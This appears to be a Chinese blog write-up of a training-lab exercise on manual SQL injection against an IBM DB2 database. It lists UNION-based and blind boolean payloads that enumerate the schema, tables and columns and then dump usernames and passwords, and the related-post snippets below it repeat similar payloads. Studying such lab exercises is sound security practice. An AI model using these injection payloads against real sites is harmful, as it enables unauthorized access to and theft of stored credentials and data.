DB2数据库注入

最新推荐文章于 2025-07-14 20:15:32 发布
原创 最新推荐文章于 2025-07-14 20:15:32 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库

本文介绍了DB2数据库的注入过程,包括确定字段数、回显位、查看数据库基本信息、爆库、爆表、爆列和爆字段值。在靶场环境中,作者通过操作发现数据库名为DB2INST1,存在GAME_CHARACTER和NOTICE表,字段包括ID、NAME、PASSWORD和STATUS。然而,尝试获取key未果,key具有特定格式。文章还提到了sysibm.sysdummy1系统表的作用,并提供了其他DB2数据库注入的相关资源链接。

db2数据库

这里使用的靶场为墨者学院在线靶场
在这里插入图片描述

确定字段数

在这里插入图片描述
在这里插入图片描述

确定回显位

id=-1 union select 1,2,3,4 from syscat.tables

在这里插入图片描述

查看数据库基本信息/爆库

爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1

  • 科普时间
  • sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息
  • 在这里插入图片描述
id=-1 union select 1,current schema,current server,4 from sysibm.sysdummy1
或者
id=-1 union select 1,current schema,current server,4 from syscat.tables

在这里插入图片描述
在这里插入图片描述
此时,确定库名为DB2INST1

爆表

爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.columns表

id=-1 union select 1,current schema,tabname,4 from syscat.tables where tabschema=current schema limit 0,1
id=-1 union select 1,current schema,tabname,4 from syscat.tables where tabschema=current schema limit 1,1
或者
id=-1 union select 1,table_name,column_name,4 from sysibm.columns where table_schema=current schema limit 1,1

在这里插入图片描述
在这里插入图片描述
此时,确定表名为GAME_CHARACTER、NOTICE表
在这里插入图片描述

爆列

爆表可以使用的表可以是syscat.columns,也可以是sysibm.columns表

id=-1 union select 1,colname,current schema,4 from syscat.columns where tabschema=current schema and tabname='GAME_CHARACTER' limit 0,1
id=-1 union select 1,colname,tabname,4 from syscat.columns where tabschema=current schema and tabname='GAME_CHARACTER' limit 1,1
或者
id=-1 union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='GAME_CHARACTER' limit 0,1

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
确定字段为:ID、NAME、PASSWORD、STATUS

爆字段值

id=-1 union select 1,NAME,PASSWORD,4 from GAME_CHARACTER limit 0,1

在这里插入图片描述
在这里插入图片描述
最后没有提交成功key
在这里插入图片描述
吐槽一下查询出来的key本来就有32位,以mozhe开头的格式。。。
求大佬的指点

其他用法

id=1 and 1<(select count(NAME) from SYSIBM.SYSTABLES where CREATOR=USER)	//猜用户表数量

在这里插入图片描述

id=1 and 6<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in('COLUMNS') fetch first 1 rows only)	//猜表长度

在这里插入图片描述
其他可以参考链接: DB2.

墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
qq_48368964的博客
07-22 877
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
DB2数据库连接驱动jar包
05-28
DB2数据库连接驱动jar包是用于Java应用程序与IBM的DB2关系型数据库系统进行通信的重要组件。这些jar包提供了JDBC(Java Database Connectivity)驱动程序,使得Java开发者可以通过编写Java代码来执行SQL语句,从而...
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2884
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
【墨者靶场】sql注入Db2数据库
qq_70836100的博客
07-22 370
地址:https://www.mozhe.cn/bug/detail/NjM3MSt5VWovcWtHOU9kaUF5dUFXQT09bW96aGUmozhe。2.此题思路是去找注入点,点击图中的通知,没有就刷新。8.这里需要对密码进行解码,再登陆就会有KEY。这里的字段name,password被隐藏了。3.使用sqlmap,查询数据库。1.首先启动(3墨币)7.查password。
DB2数据库注入攻击技术解析
在网络安全领域,数据库注入是一种常见的攻击手段,通过向应用程序的输入字段中插入恶意的SQL代码,攻击者可以获取、修改或删除数据库中的敏感信息。DB2作为IBM的一款关系型数据库管理系统,也可能会成为这种攻击的...
DB2数据库驱动JAR包下载与使用指南
07-05
DB2 JDBC驱动是Java应用连接IBM DB2数据库的必备组件,完全兼容JDBC标准。经实测,该驱动在JDK 1.8与DB2 10.1环境下运行稳定。DB2作为IBM企业级数据库,支持跨平台部署(Windows/Linux/Unix/macOS),以高安全性和...
sqlinjection in db2数据库
Coisini的博客
05-25 405
使用DB2的人比较少了,今天碰到了一个可供注入DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 参考了IBM DB2的文档,总结了这样几条: 1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 可以返回系统中所有用户创建的表(table)名 2、select NAME from SYSIBM.SYSCOLUMNS ...
DB2静态/动态SQL语句与SQL注入攻击
Simon's Tech Book
06-01 4129
今天在指导一个小型DB2项目开发时,突然想到了为什么SQL注入攻击之类的黑客技术在我接受的DB2的mainframe项目中根本没有提及,应该就是因为DB2的静态SQL语句机制。 我们先来看定义。静态SQL:在编程语言中,语句以hard code的方式写在程序中,但是其中允许有变量。这样的程序需要经过DB2预编译,将对这样的SQL语句的调用变成native language call。而
IBM DB2 SQL
04-17
This book is a reference for Structured Query Language (SQL) for DB2 Universal Database™ for z/OS®. Unless otherwise stated, references to SQL in this book imply SQL for DB2® UDB for z/OS, and all objects described in this book are objects of DB2 UDB for z/OS.
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
db2中count(*) as cnt报错_WEB安全之SQL注入(4)——floor报错
weixin_42497299的博客
12-17 629
大家好,我是阿里斯,一名IT行业小白。今天分享的内容是报错注入,本篇文章会以floor报错为中心进行分析,希望对你有所帮助!报错注入利用情景页面上没有显示位。但是会输出sql语句执行错误的信息floor报错注入常用函数 | 方法rand() 随机数函数floor() 向下取整函数count() 计数函数group by 分组方法floor...
DB2手工注入
qq_65852138的博客
08-20 335
DB2手工注入
DB2手工注入攻略
2401_88387979的博客
12-05 592
环境:墨者学院。
墨者学院-SQL手工注入漏洞测试(Db2数据库)解析
l_OMl_l的博客
07-22 385
由于是Db2数据库,所以当查询不到列时,直接指定列名,根据ID猜测name与password为大写,若未查到,可换username,userpassword等。通过题目得知本题为Db2数据库,故得知数据库DB2INST1。切记查询时带上ID一起查询,否则查出的数据是错误的,无法登陆。
java db2 sql注入_Hibernate使用中,防止SQL注入的一些措施
weixin_35955473的博客
02-13 385
Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。在获取便利操作的同时,SQL注入问题也值得我们的密切注意,下面就来谈谈几点如何避免SQL注入:1.对参数名称进行绑定:Query query=session.createQuery(hql);query.setString(“name”,na...
墨者学院SQL注入靶场练习(Db2数据库)
最新发布
weixin_74124665的博客
07-14 143
查找下一个表的话把上面limit 0,1换成1,1,然后依次类推,这样我们就得到了连个表。查下一个字段limit 0,1 中0递增就行,这样我们就查到3个字段。发现2,3位置有回显,那么我们就在2,3位置判断数据库名字。得知数据库DB2INSTI,然后这个数据库中的表。启动环境发现公告拿里有id=1传参点。执行下列语句,判断出存在注入。这样我们就得到了最后的两端信息。执行下列语句判断出有4列。执行下列语句判断回显位置。然后判断表中的字段名。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值